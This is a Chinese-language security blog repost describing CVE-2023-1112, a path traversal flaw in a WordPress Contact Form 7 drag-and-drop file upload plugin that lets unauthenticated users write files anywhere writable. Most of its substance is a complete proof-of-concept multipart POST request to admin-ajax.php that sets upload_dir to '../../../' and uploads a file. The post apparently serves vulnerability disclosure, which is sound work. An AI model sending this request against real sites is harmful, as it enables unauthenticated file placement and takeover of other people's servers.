CVE-2023-1112 - WP Contact Form 7 v5.0.6.1 路径遍历

admin 2023年3月13日09:15:55评论202 views字数 1429阅读4分45秒阅读模式

        拖放多个文件上传程序中的路径遍历 PRO - Contact Form 7 版本 5.0.6.1 允许未经身份验证的远程攻击者将文件上传到远程服务器上可写的任何位置 (CVE-2023-1112)。

        要利用此漏洞,攻击者需要使用插件的形式上传文件。在这个帖子请求中需要有参数upload_name,该参数的值是文件将上传到的文件夹的名称。攻击者可以放任何他想要的东西,例如../../../../foldername(它将在上传目录中创建文件夹“foldername”)等。


POST /wp-admin/admin-ajax.php HTTP/2Host: example.orgContent-Length: 756Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPiX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="size_limit"
2e+9------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="action"
dnd_codedropz_upload------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="upload_dir"
../../../------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="post_id"
1868------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="security"
0a4dca2b89------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="form_id"
9210------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="upload_name"
foto------WebKitFormBoundaryIzvIrbHjHpxzepPiContent-Disposition: form-data; name="upload-file"; filename="pngout.png"Content-Type: image/png
// image contents------WebKitFormBoundaryIzvIrbHjHpxzepPi--


CVE-2023-1112 - WP Contact Form 7 v5.0.6.1 路径遍历

CVE-2023-1112 - WP Contact Form 7 v5.0.6.1 路径遍历

CVE-2023-1112 - WP Contact Form 7 v5.0.6.1 路径遍历


原文始发于微信公众号(Khan安全攻防实验室):CVE-2023-1112 - WP Contact Form 7 v5.0.6.1 路径遍历

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月13日09:15:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-1112 - WP Contact Form 7 v5.0.6.1 路径遍历https://cn-sec.com/archives/1601163.html

发表评论

匿名网友 填写信息